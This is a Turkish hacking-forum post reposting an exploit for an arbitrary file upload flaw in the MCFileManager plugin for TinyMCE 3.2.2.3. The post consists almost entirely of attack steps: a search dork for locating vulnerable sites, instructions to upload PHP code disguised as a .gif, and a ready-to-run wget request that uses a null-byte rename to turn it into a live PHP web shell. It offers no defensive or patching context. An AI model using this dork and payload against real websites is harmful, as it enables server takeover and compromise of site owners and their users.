Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: MCFileManager Plugin for TinyMCE 3.2.2.3 - Arbitrary File Upload Vulnerability
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 61 / 100
Rep Sayısı: 117
Mesaj Sayısı: 5586
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
MCFileManager Plugin for TinyMCE 3.2.2.3 - Arbitrary File Upload Vulnerability
03.02.2014 21:12
Kod:
http://tinymce.moxiecode.com/plugins_filemanager.php Major version 3 Minor version 2.2.3   ####################################################################          Author             : Vladimir Vorontsov        Contact            : d0znpp [at] gmail [dot] com          Greetz       : GNU        My Group         : ONSEC Russian Security Team   ####################################################################   [~] DORK: inurl:/tiny_mce/plugins/filemanager/  

[~] You go to      : http://web.com/tiny_mce/plugins/filemanager/pages/fm/index.html [~]
Upload shell   : use PHP content and .gif extension, in example a.gif [~]
Move it 2 .php :  $ wget --post-data="json_data=%7B%22method%22%3A%22fm.moveFiles%22%2C%22params%22%3A%5B%7B%22frompat​h0%22%3A%22%7B0%7D%2Fimages%2F *a.gif*%22%2C%22toname0%22%3A%22*a.php%00.gif*%22%7D%5D%2C%22id%22%3A%22c0%22%7D​"  http://web.com/tiny_mce/plugins/filemanager/rpc/index.php   ####################################################################[/php]
(Bu konu en son: 03.02.2014 Tarihinde, Saat: 21:13 düzenlenmiştir. Düzenleyen: DaRKNeSS.)


Alinti



1 Ziyaretçi
[-]
Sponsor Reklam